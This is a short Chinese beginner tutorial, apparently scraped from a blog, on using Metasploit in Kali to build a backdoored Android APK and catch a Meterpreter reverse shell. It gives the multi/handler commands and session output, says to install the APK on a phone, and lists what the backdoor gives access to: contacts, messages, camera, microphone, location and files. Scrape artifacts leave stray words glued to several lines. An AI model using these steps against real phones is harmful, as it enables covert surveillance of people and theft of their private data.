Kali之Metasploit生成apk後門控制安卓

掃盲教程,大佬勿噴。html

實驗中請更改成你環境的IP。java

生成apk後門

Kali Linux(Hack):192.168.169.76android

Android(靶機):192.168.169.137web

啓動kali,開終端,生成apk後門。僅有9.2k的apk,也是蠻吊瀏覽器

lhost爲kali的ip,lport指定一個端口。bash

開metasploit控制檯偵聽

 

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp #設置payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 #對應剛纔設的端口
lport => 445
msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400

  

複製apk出來裝到手機上打開後就能夠exploit了,會看到會話反彈回來。微信

能夠看下幫助都有啥操做session

meterpreter > helpapp

功能示例

讀取聯繫人,信息,拍照,錄音,獲取位置信息,上傳下載文件等等,仍是挺強大的。tcp

Kali之Metasploit生成apk後門控制安卓Kali之Metasploit生成apk後門控制安卓

Kali之Metasploit生成apk後門控制安卓

補充freebuf上的文章:

相關文章
相關標籤/搜索